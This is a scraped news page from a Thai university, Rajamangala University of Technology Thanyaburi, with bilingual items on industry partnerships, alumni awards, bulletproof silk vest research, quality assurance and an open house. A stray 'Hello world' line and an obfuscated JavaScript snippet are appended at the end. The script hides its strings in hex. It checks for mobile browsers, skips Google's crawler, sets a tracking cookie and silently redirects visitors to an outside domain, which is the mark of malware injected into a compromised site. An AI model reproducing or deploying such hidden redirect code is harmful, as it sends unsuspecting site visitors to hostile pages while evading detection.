ภาพข่าว: สังคมสยามรัฐ: ร่วมมือ (Dr. Numyoot inked an agreement with various private sectors.)

รศ.ดร.นำยุทธ สงค์ธนาพิทักษ์ อธิการบดีมหาวิทยาลัยเทคโนโลยีราชมงคลธัญบุรีลงนามความร่วมมือกับเครือเบทาโกร เซ็นทรัลเรสตอรองส์ กรุ๊ป เอ็มเคเรสโตรองต์ จำกัด และแบล็คแคนยอน (ประเทศไทย) ในโครงการนำร่องการจัดการเรียนการสอนเชิงบูรณาการกับการทำงาน ที่ห้องมังคลอุบล มหาวิทยาลัยเทคโนโลยีราชมงคลธัญบุรี

Dr. Numyoot inked an agreement with various private sectors.

Associate Professor Dr. Numyoot Songthanapitak, the University president, Rajamangala University of Technology Thanyaburi (RMUTT), inked an agreement with Betagro Group, Central Restaurants Group and BlackCanyon Coffee, Thailand, in the purposes of working together on the educational integration development (between studies and works). This was held at Rin Ubon Conference Room, RMUTT.  

Translated by Mr. Suraporn Onputtha More >

คอลัมน์ แวดวงการศึกษา: มทร.ธัญบุรีรับตรงถึง 28 ก.พ.

B-100219020114 More >

คอลัมน์ NEWS UPDATE: มทร.ธัญบุรี จัดตลาดนัดแรงงาน

C-100215041018 More >

คอลัมน์ Ed Station: มทร.ธัญบุรี ทอดผ้าป่าหนังสือ

C-100214011042 More >

คอลัมน์ ข่าวประชาสัมพันธ์: มทร.ธัญบุรี จัดทอดผ้าป่าหนังสือ 9 วัด

C-100212017071 More >

รายงานพิเศษ: วาเลนไทน์-รักประเทศ ธัญบุรีวอนบอกรักบ้านเมือง

B-100215037077 More >

วาเลนไทน์ปีนี้วอนคนไทยบอกรักเมือง

B-100213018107_Page_1 More >

คอลัมน์ โทรโข่งขยายข่าว: เรียนร่วมเอกชน

B-100211009084 More >

ภาพข่าว: ศิษย์เก่า ดีเด่น (Congratulations to the award receivers.)

นายกสภามหาวิทยาลัยเทคโนโลยีราชมงคล (มทร.) ธัญบุรี พร้อมด้วย รศ.ดร.นำยุทธ สงค์ธนาพิทักษ์ใหม่ อธิการบดี มทร.ธัญบุรี แสดงวความยินดีกับผู้ที่ได้รับรางวัลศิษย์เก่า ดีเด่น ในงานวันคล้ายวันสถาปนามหาวิทยาลัย ณ หอประชุม มทร.ธัญบุรี.

Congratulations to the award receivers.

Associate Professor Dr. Numyoot Songthanapitak and the president of Alumni Association, Rajamangala University of Technology Thanyaburi (RMUTT), had participated in congratulating the Good Alumni Award receivers at RMUTT Conventional Hall (Meeting Hall).   

Translated by Mr. Suraporn Onputtha More >

จากสิ่งทอพัฒนาไปสู่เสื้อเกราะกันกระสุน

B-100209040090 More >

คอลัมน์ ASTVผู้จัดการ Online: เสื้อเกราะกันกระสุน ทน M16-ปืนพกทุกชนิด

B-100209040090เมื่อหลายปีก่อนมหาวิทยาลัยเทคโนโลยีราชมงคลธัญบุรี ได้เปิดตัวเสื้อเกาะกันกระสุนจากเส้นใยไหมแท้ 100%เป็นตัวแรกของโลกมาแล้ว สามารถป้องกันกระสุนปืนขนาด .22, .38 และ 11 มม. ด้วยราคาต้นทุนในงานวิจัยตัวละประมาณ 8-9 พันบาทแต่ ทีมนักวิจัย อันประกอบด้วย รศ.สุจิระ ขอจิตต์เมตต์, ผศ.ดร.สมประสงค์ ภาษาประเทศ และ ผศ.ดร.อภิชาติ สนธิสมบัติ ทั้งหมดได้ช่วยกัน พัฒนาเสื้อเกราะกันกระสุนที่มีประสิทธิภาพทดแทน ด้วยกรรมวิธีที่ไม่เหมือนเดิม ส่งผลให้สมรรถนะของเสื้อเกราะรุ่นใหม่ตัวนี้สามารถป้องกันกระสุนจากปืนพกขนาดสั้นทั้งหมด รวมทั้งป้องกัน เอ็ม 16 ซึ่งเป็นอาวุธสงครามร้ายแรง ส่วนจะใช้เทคนิคในการผลิตแบบไหนราคาตกตัวละประมาณเท่าใด…
ติดตามได้ที่ http://manager.co.th/Campus

กองประชาสัมพันธ์ มทร.ธัญบุรี
โทรศัพท์ 02-549-3333
โทรสาร 02-549-4993

คอลัมน์ เคาะประตูแคมปัส: เครื่องนวดข้าวฟ่างนวัตกรรมเกษตรจากธัญบุรี

B-100209012047 More >

มทร.ฟุ้งคนแห่ฝึกอาชีพ

B-100209004134 More >

คอลัมน์ สี่แยกข่าวย่อย: มทร.ธัญบุรีทอดผ้าป่าหนังสือ

B-100209004074 More >

การพัฒนาคุณภาพการศึกษาสู่ความเป็นเลิศ Education Development to Excellence

          โครงการ “พัฒนาคุณภาพการศึกษาสู่ความเป็นเลิศ”ในปัจจุบันมหาวิทยาลัยในประเทศไทยได้ให้ความสำคัญกับระบบและกลไกการประกันคุณภาพการศึกษาเนื่องจากมี  พ.ร.บ.การศึกษา ได้กำหนดไว้ให้หมวดที่  6  การประกันคุณภาพการศึกษาและมหาวิทยาลัยทุกแห่งได้ดำเนินการจัดทำระบบและกลไกการประกันคุณภาพ     ซึ่งมีการประกันคุณภาพภายในผู้รับผิดชอบคือ  สกอ.  สำหรับ  สมศ. เป็นองค์กรมหาชนที่รับผิดชอบการประกันคุณภาพภายนอก      ประเมินคุณภาพภายในเป็นการประเมินเพื่อปรับปรุงและพัฒนาและการประเมินคุณภาพภายนอกเพื่อเสนอสาธารณชนให้ทราบ ในการประเมินคุณภาพภายนอกจะมีเกณฑ์รับรองหรือไม่รับรองและมีผลกระทบต่อการบริหารจัดการทางการศึกษาของมหาวิทยาลัย  ขณะเดียวกันแนวทางการประกันคุณภาพทั้งภายในและภายนอกก็ยังมีความเข้มข้นมากขึ้น   สถานศึกษาทุกแห่งจะต้องพัฒนาระบบต่าง ๆ  ให้ทันกับการเปลี่ยนแปลงที่เกิดขึ้นและและเชิงพัฒนาคุณภาพให้เป็นระบบยิ่งขึ้น

          ประกอบการศึกษาในเวทีโลกมีการจัดอันดับ   (Ranking)   การเตรียมการให้มหาวิทยาลัยก้าวไกลไปสู่เวทีโลกและเข้าสู่การเป็นมหาวิทยาลัยระดับ  World  Class  จึงเป็นสิ่งสำคัญที่มหาวิทยาลัยต้องเตรียมการ และในการเตรียมการกับมหาวิทยาลัยควรจะเริ่ม
เตรียมการตั้งแต่การจัดทำแผน กลยุทธของมหาวิทยาลัยให้สอดคล้องกับแผนการศึกษาชาติ แผนพัฒนาการศึกษา กระทรวงศึกษาธิการและแผนพัฒนาการศึกษาของสกอ.กรอบมาตรฐานด้านการพัฒนาคุณภาพการศึกษากรอบมาตรฐานคุณวุฒิ
(TQF)กับการประกันคุณภาพการศึกษาและการเตรียมเพื่อเข้าสู่ความเป็นเลิศทางด้านคุณภาพการศึกษา
  ลงทะเบียนออนไลน์

Education Development to Excellence

The crucial project term namely “Education Development to Excellence” in the present is playing an important role for Thailand universities that they have to play significantly on developing an educational quality assurance mechanism and system according to Education Act defining at the chapter no. 6. This 6th chapter mentions on educational quality assurance which Thailand universities have to establish mechanism and system of educational quality assurance under the Office of Higher Education Commission’s responsibility. The Office for National Education Standards and Quality Assessment (Public Organization) is a key external educational quality assurance. The internal assurance is created to develop and improve within the area, and external assess is established in order to announce to publicity. Moreover, the external assess has clear criteria to certify and its certification can affect the universities’ administration. At the same time, both internal and external educational assurance system are more vigorous increasingly. Every university must develop their educational assurance systems to be compatible to the changes.

According to the global ranking, the preparation of the universities being leveled in the world class is a momentous issue for the universities. The preparation must starts from strategy planning in order to match with National Education under Educational Development Plan of the Ministry of Education and Office of Higher Education Commission’s educational plan. Moreover, study of framework of Thailand Qualification Framework (TQF) with educational quality assurance is also important. Preparation to Education Development to Excellence, clicking at Online Register

Translated by Suraporn Onputtha   

ขอเชิญร่วมงาน “ ราชมงคล RT สร้างคนสู่งาน และงาน Open House”

          มหาวิทยาลัยเทคโนโลยีราชมงคลธัญบุรี ขอเชิญร่วมงาน  “ ราชมงคล RT สร้างคนสู่งาน  และงาน Open House”
เนื่องในวันครบรอบสถาปนามหาวิทยาลัย ในวันที่ 16-18 มกราคม 2553  ณ มหาวิทยาลัยเทคโนโลยีราชมงคลธัญบุรี (คลองหก)  อ.ธัญบุรี จ.ปทุมธานี  ภายในงาน ชมนิทรรศการ ผลงานวิชาการ สิ่งประดิษฐ์งานวิจัยถ่ายทอดเทคโนโลยี เสวนา QA บรรยายทางวิชาการ  กิจกรรมถนนสายวัฒนธรรม ชมกิจกรรมการเรียนการสอนห้องปฏิบัติการของคณะต่างๆ  ตลาดนัดแรงงานและการฝึกอบรมอาชีพ  ตลอดจนรับสมัครนักศึกษาระดับปริญญาตรี โท เอก ผู้สนใจสอบถามข้อมูล โทร 0-2549-3501-5

Hello world. This my website!

Hello world. This my website!

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}